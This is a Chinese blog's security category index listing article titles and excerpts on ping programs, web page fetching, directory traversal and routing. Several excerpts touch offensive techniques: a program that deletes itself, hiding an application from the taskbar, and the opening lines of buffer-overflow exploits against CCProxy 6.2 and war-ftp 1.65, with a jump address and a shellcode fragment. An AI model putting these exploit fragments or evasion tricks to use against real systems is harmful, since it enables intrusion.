
网络安全
文章平均质量分 65
my2005lb
有乐观的心态,性格沉稳,不事张扬(http://www.cdus.org)
展开
-
目录遍历漏洞的探测
随机打开一个Jsp的网站,发现由于在系统管理员在配置方面的不小心,存在目录遍历的漏洞,有的甚至没有关闭Tomcat自带的管理界面。 在查找这些网站时,我发现国外做的要比国内做的好,一般国内40%以上的网站存在此类问题,特别是有的服务端口放在8080,这种问题更显突出,而国外存在此种情况不多,如果有也是一些网站提供WEB下载服务,而粗心配置的可能性较少,这里的国外一般是指欧美,韩国以原创 2008-09-20 11:06:00 · 7814 阅读 · 0 评论 -
如何让程序进行自我删除
如何让程序完成自我删除,直接删办法没有想到,想了一种间接删除法,即先从程序中释放出来一个小的Shell文件,在Window中可以是一个.bat,批处理文件,在Linux就是一个Shell文件。 以Window平台为例,当前运行的可执行文件是Test.exe。当在使用这个Test.exe,出现了一些危机情况或才非法权限运行,程序会自动进行删除,删除前创建一个del.bat 内容可以是原创 2008-09-21 22:03:00 · 896 阅读 · 0 评论 -
zebra使用手册
对于网络互联工程师们来说,建立一个动态是非常重要的。这不仅需要了解的概念,而且还必须知道如何付诸实践。就目前而言,主要由这样的大公司来提供。大多数独立的路由开发者们常常受到学校或实验室环境的制约,无法充分利用现有的资源。而利用技术设备打造网络需要大量的成本。为了打破这种局面,我们利用一个小型的实验网络,应用路由信息(RIP)和开放式最短路径优先(OSPF)两种技术,展示各自不同的平衡加载方案。转载 2009-01-06 22:02:00 · 3719 阅读 · 1 评论 -
基于C语言与原始套接字实现Ping程序
源代码如下:ping.h#pragma pack(1)//#define u_char unsigned char//#define u_short unsigned short #include#define ICMP_ECHOREPLY 0#define ICMP_ECHOREQ 8//////////////////////////////////type原创 2013-03-18 22:16:46 · 2609 阅读 · 0 评论 -
基于Socket与C的WEB页面抓取程序
基于C与Socket编写了一个HTTP页面检查程序,通过这个程序,可以加载指定WEB服务器上的页面信息,这在爬虫、抓取WEB页面、分析是否有挂马行为有参考意义。 代码如下://---#include #include #include #include #include #includechar *checkhttp(char *path){ WSADATA原创 2013-03-18 22:36:35 · 1812 阅读 · 0 评论 -
应用程序从任务栏中隐藏的C代码
本条语句是将应用程序从任务栏中去掉 ModifyStyleEx(WS_EX_APPWINDOW, WS_EX_TOOLWINDOW); 对于MFC程序,可以放置于系统初始化。 另外保证应用程序唯一性的运转,可以用下面的代码(采用互斥技术): HANDLE hMutex = NULL; hMutex = ::CreateMutex(NULL,FALSE,"OPE原创 2013-03-19 21:06:55 · 1110 阅读 · 0 评论 -
发布一个C编写的Ping类
CPing.h// Ping.h: interface for the CPing class.////////////////////////////////////////////////////////////////////////#if !defined(AFX_PING_H__2EBF2C11_A0A3_403B_9EB2_1905CFF8EE58__INCLUDE原创 2013-03-19 21:09:35 · 1106 阅读 · 0 评论 -
CCProxy缓存区溢出攻击代码
针对CCProxy6.2的一个缓存区溢出漏洞(telnet到CCProxy服务器,当执行ping命令主机名输入超过1012字节时),实现Shellcode的代码注入。 #include #include #include #pragma comment (lib,"ws2_32")// jmp esp address of chinese version原创 2013-03-19 21:27:43 · 2186 阅读 · 0 评论 -
warftp缓存区溢出攻击C代码
针对war-ftp 1.65,当用户在执行登录时,若其用户名输入长度大于485,则会发生溢出错误,下面给出一段示例代码:#include #include #pragma comment(lib,"ws2_32")#define JUMPESP "\x12\x45\xfa\x7f"// exec calcchar shellcode[] = "\原创 2013-03-19 21:31:43 · 1741 阅读 · 1 评论